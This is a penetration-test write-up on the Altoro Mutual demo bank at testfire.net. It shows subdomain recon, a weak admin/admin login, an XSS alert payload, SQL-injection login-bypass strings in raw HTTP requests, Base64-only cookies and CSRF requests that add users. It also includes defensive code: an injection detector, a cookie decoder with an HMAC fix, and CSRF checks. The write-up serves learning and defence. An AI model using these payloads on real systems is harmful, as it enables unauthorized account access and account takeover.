
Notes on a penetration test

Target

testfire.net

CDN

Information gathering:

Since it is a single site, start by fingerprinting it:

A single URL! Let's see whether there are any neighbouring sites (other hosts on the same IP) or the like!

Check the subdomains:

| No. | Subdomain | Title | IP address | Server |
|-----|-----------|-------|------------|--------|
| 1 | demo.testfire.net | Altoro Mutual | 65.61.137.117 | Apache-Coyote/1.1 |
| 2 | www.testfire.net | Altoro Mutual | 65.61.137.117 | Apache-Coyote/1.1 |
| 3 | testfire.net | Altoro Mutual | 65.61.137.117 | Apache-Coyote/1.1 |

Neighbouring sites (other hosts on the same IP)

Vulnerability scan

First run the usual scanners over it.

SQL injection, XSS and other vulnerabilities are reported.

Manual testing combined with xray

Manually verify the vulnerabilities the scanner reported!

First pick one of the sites.

Scan / crawl the directory structure (Java site).

Ran nmap to check the OS; tried treating it as Windows, but it isn't, it is a Linux system.


Weak credentials

Scan results

All the 302 pages redirect to:

http://65.61.137.117:8080/login.jsp

A weak-credential vulnerability was found:

admin admin

XSS

Testing found an XSS vulnerability.

Payload

<script>alert(1)</script>

HttpOnly

This prevents cookie theft, but the XSS still has other impacts that can be exploited! 😑

There is no CSP either.

File inclusion

But reading:

Stored XSS

http://www.testfire.net/feedback.jsp


SQL injection

Request packet:

POST /doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Content-Length: 57
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Host: 65.61.137.117:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Connection: close
Referer: http://65.61.137.117:8080/login.jsp
Cache-Control: max-age=0
Cookie: JSESSIONID=FD515BF0B4041F280B299F5F58B86631; AltoroAccounts=ODAwMDAwfkNvcnBvcmF0ZX41LjIzODc5OTU2MUU3fDgwMDAwMX5DaGVja2luZ34xMDA2MDguNDR8
User-Agent: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.3) Gecko/20060425 SUSE/1.5.0.3-7 Firefox/1.5.0.3
Content-Type: application/x-www-form-urlencoded

uid=admin&passw=1'/**/or/**/1=(1)/**/-- -&btnSubmit=Login

/doLogin page

Verifying the PoC:

admin'/**/or/**/1=1/**//**/-- -

admin'/**/or/**/1=0/**//**/-- -

It probably filters a lot of things here!

The statements do not achieve an injection effect, and the database type could not be determined!
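From the defender's side, the comment-obfuscated login payloads above are exactly what a detection rule has to see through. This is an added example, not part of the original write-up: the request bodies are constructed samples (two reuse the payloads captured above, the paths and field names follow the captured requests), and the detector normalises `/**/` to whitespace before matching, because that is how the database reads it.

```python
import re
from urllib.parse import parse_qs

# Constructed sample of login submissions (method, path, body); the injected
# bodies reuse the payloads from the captured /doLogin and /admin/doAdminLogin
# requests, the others are ordinary logins.
SAMPLE_REQUESTS = [
    ("POST", "/doLogin", "uid=admin&passw=1'/**/or/**/1=(1)/**/-- -&btnSubmit=Login"),
    ("POST", "/doLogin", "uid=jsmith&passw=Demo1234&btnSubmit=Login"),
    ("POST", "/admin/doAdminLogin", "password=1'/**/or/**/1=1/**/-- -&btnSubmit=Login"),
    ("POST", "/doLogin", "uid=admin'/**/or/**/1=0/**//**/-- -&passw=x&btnSubmit=Login"),
    ("POST", "/admin/doAdminLogin", "password=!Q@W#E$R%T&btnSubmit=Login"),
]

# Patterns for a boolean-style login bypass, applied after comment stripping:
# a quote followed by OR, a tautology such as 1=1 or 1=(1), or a trailing
# SQL line comment ("--" or "-- -").
_SQLI = re.compile(
    r"'\s*or\b"
    r"|\b1\s*=\s*\(?\s*1\s*\)?"
    r"|--\s*-?\s*$",
    re.IGNORECASE,
)


def normalise(value):
    """Replace every /* ... */ inline comment with one space.

    MySQL treats /**/ as whitespace, so it is used to dodge filters that look
    for 'or' surrounded by spaces; the detector must see what the DB sees.
    """
    return re.sub(r"/\*.*?\*/", " ", value)


def suspicious_fields(body):
    """Return the names of form fields whose value matches an injection pattern."""
    hits = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        if any(_SQLI.search(normalise(v)) for v in values):
            hits.append(field)
    return hits


def scan(requests):
    """Return (path, [suspicious fields]) for every request that trips a pattern."""
    findings = []
    for _method, path, body in requests:
        fields = suspicious_fields(body)
        if fields:
            findings.append((path, fields))
    return findings
```

Such a rule belongs at the WAF or application log layer as an alert, not as the only defence; the fix for the injection itself is parameterised queries in /doLogin.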

The cookie "encryption" is far too simple

It is only Base64 encoding.
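As an added example (not code from the post or from Altoro Mutual), decoding the AltoroAccounts cookie captured in the /doLogin request above shows the account numbers, names and balances in the clear: Base64 is encoding, not encryption. The sign/verify helpers below are a hypothetical server-side sketch of the integrity fix (an HMAC tag); keeping the data confidential still requires not putting it in the cookie at all.

```python
import base64
import hashlib
import hmac

# AltoroAccounts cookie value exactly as captured in the /doLogin request.
ALTORO_COOKIE = (
    "ODAwMDAwfkNvcnBvcmF0ZX41LjIzODc5OTU2MUU3fDgwMDAwMX5DaGVja2luZ34xMDA2MDguNDR8"
)


def decode_accounts(cookie):
    """Undo the cookie's only 'protection', Base64, and split the records.

    Format seen after decoding: account~name~balance, records joined by '|'.
    Returns a list of (account_number, account_name, balance) tuples.
    """
    raw = base64.b64decode(cookie).decode("ascii")
    accounts = []
    for record in raw.split("|"):
        if not record:            # the trailing '|' leaves an empty element
            continue
        number, name, balance = record.split("~")
        accounts.append((number, name, float(balance)))
    return accounts


# --- Hypothetical mitigation sketch (not Altoro's code) ---------------------
# A client-held value needs a server-side MAC, otherwise it can be edited at will.
SERVER_KEY = b"constructed-placeholder-secret"   # would come from a key store


def sign(value, key=SERVER_KEY):
    """Append an HMAC-SHA256 tag as value.tag (tag is hex, so '.' is unambiguous)."""
    tag = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def verify(signed, key=SERVER_KEY):
    """Return the original value if its tag is intact, otherwise None."""
    value, _, tag = signed.rpartition(".")
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    # constant-time comparison avoids leaking how many tag bytes matched
    return value if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    for number, name, balance in decode_accounts(ALTORO_COOKIE):
        print(f"{number} {name:<10} {balance:,.2f}")
```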


Admin back-end weak-password test

Logging in to the admin back end:

POST /admin/doAdminLogin HTTP/1.1
Host: www.testfire.net
Content-Length: 35
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Origin: http://www.testfire.net
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.testfire.net/admin/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=7A74CF311FA64D4C998ED838FB3DCE43; AltoroAccounts=ODAwMDAwfkNvcnBvcmF0ZX41LjE5NzYyNjU2MUU3fDgwMDAwMX5DaGVja2luZ341Mzk1NTEuNDR8
Connection: close

password=!Q@W#E$R%T&btnSubmit=Login

Got a 302 redirect.

It redirected back to the original page again!

Try a universal (login-bypass) password!

Didn't work!

POST /admin/doAdminLogin HTTP/1.1
Host: www.testfire.net
Content-Length: 48
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Origin: http://www.testfire.net
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.testfire.net/admin/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=7A74CF311FA64D4C998ED838FB3DCE43; AltoroAccounts=ODAwMDAwfkNvcnBvcmF0ZX41LjE5NzYyNjU2MUU3fDgwMDAwMX5DaGVja2luZ341Mzk1NTEuNDR8
Connection: close

password=1'/**/or/**/1=1/**/-- -&btnSubmit=Login

CSRF

POST /admin/admin.jsp HTTP/1.1
Host: www.testfire.net
Content-Length: 95
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.testfire.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.testfire.net/admin/admin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=7A74CF311FA64D4C998ED838FB3DCE43; AltoroAccounts=ODAwMDAwfkNvcnBvcmF0ZX41LjE5NzYyNjU2MUU3fDgwMDAwMX5DaGVja2luZ341Mzk1NTEuNDR8
Connection: close

firstname=upload&lastname=upload&username=upload&password1=123456&password2=123456&add=Add+User


POST /admin/admin.jsp HTTP/1.1
Host: www.testfire.net
Content-Length: 71
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.testfire.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.testfire.net/admin/admin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=7A74CF311FA64D4C998ED838FB3DCE43; AltoroAccounts=ODAwMDAwfkNvcnBvcmF0ZX41LjIwODg5NDM2MUU3fDgwMDAwMX5DaGVja2luZ340MjY4NzMuNDR8
Connection: close

username=admin&password1=123456&password2=123456&change=Change+Password

This CSRF requires being logged in first! But if it is sent to an administrator it should still be exploitable!
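As an added defensive example (not code from the post or from Altoro Mutual), the /admin/admin.jsp add-user request captured above is reduced to the headers and fields a CSRF decision depends on and run through the two usual server-side checks: an Origin/Referer test and a per-session token. The session dict, the `csrf_token` form field and the third-party origin used in the check are assumptions.

```python
import hmac
import secrets

SITE_ORIGIN = "http://www.testfire.net"   # the site's own origin (from the page)

# The add-user request captured above, reduced to the parts a CSRF decision
# depends on. Header and field values are taken from that request.
CAPTURED_HEADERS = {
    "Origin": "http://www.testfire.net",
    "Referer": "http://www.testfire.net/admin/admin.jsp",
}
CAPTURED_FORM = {
    "firstname": "upload", "lastname": "upload", "username": "upload",
    "password1": "123456", "password2": "123456", "add": "Add User",
}


def issue_token(session):
    """Bind a fresh random anti-CSRF token to the (hypothetical) server-side
    session and return it so the form template can embed it as csrf_token."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def same_origin(headers):
    """True when Origin (or, failing that, Referer) names this site itself."""
    source = headers.get("Origin") or headers.get("Referer", "")
    return source == SITE_ORIGIN or source.startswith(SITE_ORIGIN + "/")


def reject_reason(headers, form, session):
    """Return None if a state-changing request may proceed, else why not.

    The checks are independent: a request launched from another site fails
    the origin test, and a request without the session-bound token (as the
    captured one, since the app never issued one) fails the token test.
    """
    if not same_origin(headers):
        return "origin mismatch"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(supplied, expected):
        return "missing or invalid csrf token"
    return None
```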

Sensitive information disclosure

The API routes are exposed:

https://65.61.137.117/swagger/index.html#/

Swagger UI

https://65.61.137.117/swagger/index.html#/